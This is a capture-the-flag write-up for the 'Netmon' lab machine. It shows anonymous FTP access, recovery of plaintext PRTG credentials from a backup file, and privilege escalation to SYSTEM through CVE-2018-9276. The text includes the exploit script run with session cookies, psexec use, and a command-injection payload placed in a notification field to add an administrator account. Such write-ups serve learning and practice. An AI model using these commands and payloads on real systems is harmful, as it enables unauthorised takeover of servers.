Summary

Netmon is an easy Windows box. It can be exploited by enumerating FTP and finding credentials that can be used to authenticate to PRTG which is running on port 80. After finding credentials, a script can be used (after modifications) to obtain a system shell or a manual method can be used.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

FTP Anonymous Access

It’s always helpful to check if FTP has anonymous access enabled. This is the case, ncftp was used to obtain access from where you can obtain the user.txt as shown below:

ncftp 10.129.1.126
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.129.1.126...                                                                                                                
Microsoft FTP Service
Logging in...                                                                                                                                
User logged in.
Logged in to 10.129.1.126.                                                                                                                   
ncftp / > ls
inetpub/               Program Files/         .rnd                   Windows/
PerfLogs/              Program Files (x86)/   Users/
ncftp / > cd User
Could not chdir to User: server said: The system cannot find the file specified. 
ncftp / > cd Users
ncftp /Users > ls
Administrator/   Public/
ncftp /Users > cd Public/ 
ncftp /Users/Public > ls
Documents/  Downloads/  Music/      Pictures/   user.txt    Videos/
ncftp /Users/Public > cat user.txt 
dd58[...]

I really recommend ncftp, it’s very easy to use and very effective. Even though, we now have the user.txt, we still don’t have a shell. When navigating to the webserver the following homepage is shown:

Exploitation

The default credentials don’t work and brute-forcing the credentials was also not effective. In order to get credentials, you have to read the PRTG configuration. It specifies that plaintext passwords are stored in a configuration file. This is of interest because FTP seems to have almost full access to all files on the server. This post describes in what file the credentials were stored. Navigating to this directory results in the following files:

ncftp ...r/PRTG Network Monitor > pwd
  ftp://10.129.1.126/ProgramData/Paessler/PRTG Network Monitor/


ncftp ...r/PRTG Network Monitor > ls -l
[...]
d---------   1 ftpuser  ftpusers            0 Apr 12 14:51 Monitoring Database
----------   1 ftpuser  ftpusers      1189697 Feb 25  2019 PRTG Configuration.dat
----------   1 ftpuser  ftpusers      1189697 Feb 25  2019 PRTG Configuration.old
----------   1 ftpuser  ftpusers      1153755 Jul 14  2018 PRTG Configuration.old.bak
[...]
d---------   1 ftpuser  ftpusers            0 Feb  3  2019 Ticket Database
d---------   1 ftpuser  ftpusers            0 Feb  3  2019 ToDo Database

When reading the *.bak file, you will see it contains the plaintext credentials:

These could then be used to authenticate to the webserver. However, they don’t work as expected. This is a bit of an annoying part, but the password is a backup file and obviously created in 2018 (can be seen by the password and the creation date). However, the other files (see listing above), are created in 2019. When you enter: prtgadmin with as password PrTg@dmin2019, you will be authenticated:

Searchsploit finds an authenticated remote code execution exploit script for this:

searchsploit PRTG
-------------------------------------------------------- ---------------------------------
 Exploit Title                                          |  Path
-------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote C | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS   | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (D | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting | java/webapps/34108.txt
-------------------------------------------------------- ---------------------------------

Method one: Automated

You will get this error when running the script on linux systems:

./46527.sh -u http://10.129.1.126 -c "_ga=GA1.4.318851996.1617821649; _gid=GA1.4.1240126346.1618253280; OCTOPUS1813713946=ezExM0Y0OUQxLUFCNzUtNDkxQS1CMDkzLTMxOEVCMDI2MEY4Q30%3D; _gat=1"

bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory

This is probably because the script has been created in a Windows environment and ported over to run on a Unix environment. It can be fixed by running:

dos2unix 46527.sh 
dos2unix: converting file 46527.sh to Unix format...

Now you can use the script as follows (make sure to use your own cookies):

./46527.sh -u http://10.129.1.126 -c "_ga=GA1.4.318851996.1617821649; _gid=GA1.4.1240126346.1618253280; OCTOPUS1813713946=ezExM0Y0OUQxLUFCNzUtNDkxQS1CMDkzLTMxOEVCMDI2MEY4Q30%3D; _gat=1"

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

Now there are multiple ways to obtain a reverse shell. I like to use psexec.py:

python3 /opt/impacket/examples/psexec.py pentest:'P3nT3st!'@10.129.1.126
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.129.1.126.....
[*] Found writable share ADMIN$
[*] Uploading file ApRFyTGQ.exe
[*] Opening SVCManager on 10.129.1.126.....
[*] Creating service Reyb on 10.129.1.126.....
[*] Starting service Reyb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Method two: Manual

This blog post illustrates how to do it manually.
You will have to go to Setup > Account Settings > Notifications. Then you can add a new notification (the plus symbol)", finally, scroll to the bottom and open “Execute Program”:

You can add the following payload to the Parameter to add an administrative user:

pwned.txt;net user jeroen password /add;net localgroup administrators jeroen /add

Final configuration looks as follows:

This will issue the following POST request:

POST /editsettings HTTP/1.1
Host: 10.129.1.126
[...]

Content-Disposition: form-data; name="address_10"

Demo EXE Notification - OutFile.ps1
-----------------------------174728350230219553953197710489
Content-Disposition: form-data; name="message_10"

pwned.txt;net user jeroen password /add;net localgroup administrators jeroen /add

You will have to click this on the following screen:

Which will show the following message:

Now you can obtain a system shell the same way as shown in the automated method.


Conclusion

I’m not sure how I feel about this box. Finding the credentials in those files was not as straightforward because you really had to dive deep in the documentation to find them but once you found them the box was very doable. Hope you learned something and enjoyed this writeup!